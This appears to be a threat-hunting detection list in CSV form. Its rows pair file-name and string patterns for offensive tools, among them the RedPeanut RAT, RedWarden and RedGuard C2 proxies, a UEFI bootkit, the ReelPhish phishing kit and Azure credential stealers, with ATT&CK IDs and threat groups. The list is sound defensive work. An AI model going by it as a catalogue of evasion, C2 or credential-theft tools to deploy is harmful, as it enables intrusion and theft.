"*RedGuard_x86.exe*",".{0,1000}RedGuard_x86\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*redhuntlabs*",".{0,1000}redhuntlabs.{0,1000}","offensive_tool_keyword","redhuntlabs","documentation for offensive operation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*redhuntlabs/BucketLoot*",".{0,1000}redhuntlabs\/BucketLoot.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","4","333","49","2024-04-13T11:14:24Z","2023-07-17T09:06:14Z" "*RedHunt-OS*",".{0,1000}RedHunt\-OS.{0,1000}","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","10","1195","182","2020-07-13T04:54:49Z","2018-03-14T19:31:16Z" "*Redirect LoadLibraryA to LdrLoadDll with spoofed ret addr !*",".{0,1000}Redirect\sLoadLibraryA\sto\sLdrLoadDll\swith\sspoofed\sret\saddr\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*redis-rce*",".{0,1000}redis\-rce.{0,1000}","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","9","894","219","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z" "*redlotus.efi*",".{0,1000}redlotus\.efi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","487","58","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*RedPeanut Smb server started*",".{0,1000}RedPeanut\sSmb\sserver\sstarted.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Models*",".{0,1000}RedPeanut\.Models.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*redpeanut.pfx*",".{0,1000}redpeanut\.pfx.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Resources.*.txt",".{0,1000}RedPeanut\.Resources\..{0,1000}\.txt","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Utility*",".{0,1000}RedPeanut\.Utility.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.C2*",".{0,1000}RedPeanutAgent\.C2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Core*",".{0,1000}RedPeanutAgent\.Core.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.cs*",".{0,1000}RedPeanutAgent\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Evasion*",".{0,1000}RedPeanutAgent\.Evasion.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Execution*",".{0,1000}RedPeanutAgent\.Execution.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutAgent.Program*",".{0,1000}RedPeanutAgent\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutC2*",".{0,1000}RedPeanutC2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutCLI*",".{0,1000}RedPeanutCLI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutDBContext*",".{0,1000}RedPeanutDBContext.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutDBInitializer*",".{0,1000}RedPeanutDBInitializer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutHtaPowerShellScript*",".{0,1000}RedPeanutHtaPowerShellScript.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutHtaScript.hta*",".{0,1000}RedPeanutHtaScript\.hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutInstallUtil.cs*",".{0,1000}RedPeanutInstallUtil\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutManager.cs*",".{0,1000}RedPeanutManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutMigrate.cs*",".{0,1000}RedPeanutMigrate\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutMSBuildScript.xml*",".{0,1000}RedPeanutMSBuildScript\.xml.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutPowershellScriptS*",".{0,1000}RedPeanutPowershellScriptS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutRP.cs*",".{0,1000}RedPeanutRP\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutShooter.*",".{0,1000}RedPeanutShooter\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutSpawn.cs*",".{0,1000}RedPeanutSpawn\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutSpawnTikiTorch.cs*",".{0,1000}RedPeanutSpawnTikiTorch\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanutVBAMacro.vba*",".{0,1000}RedPeanutVBAMacro\.vba.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedSiege/CIMplant*",".{0,1000}RedSiege\/CIMplant.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","1","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*RedSiege/GraphStrike*",".{0,1000}RedSiege\/GraphStrike.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","1","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*redskal/SharpAzbelt*",".{0,1000}redskal\/SharpAzbelt.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","26","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*redsocks-fw.sh stop*",".{0,1000}redsocks\-fw\.sh\sstop.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*Red-Team-Infrastructure-Wiki.*",".{0,1000}Red\-Team\-Infrastructure\-Wiki\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Red-Teaming-Toolkit*",".{0,1000}Red\-Teaming\-Toolkit.{0,1000}","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","8528","2138","2024-03-25T12:08:31Z","2018-04-26T13:35:09Z" "*RedTeamOperations*",".{0,1000}RedTeamOperations.{0,1000}","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RedTeamOperations","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RedWarden.py*",".{0,1000}RedWarden\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*RedWarden.test*",".{0,1000}RedWarden\.test.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*redwarden_access.log*",".{0,1000}redwarden_access\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*redwarden_redirector.log*",".{0,1000}redwarden_redirector\.log.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*ReelPhish*",".{0,1000}ReelPhish.{0,1000}","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","6","501","153","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z" "*reflct_dll_inject.exe*",".{0,1000}reflct_dll_inject\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","690","117","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*reflective_assembly_minified.ps1*",".{0,1000}reflective_assembly_minified\.ps1.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*reflective_dll.dll*",".{0,1000}reflective_dll\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 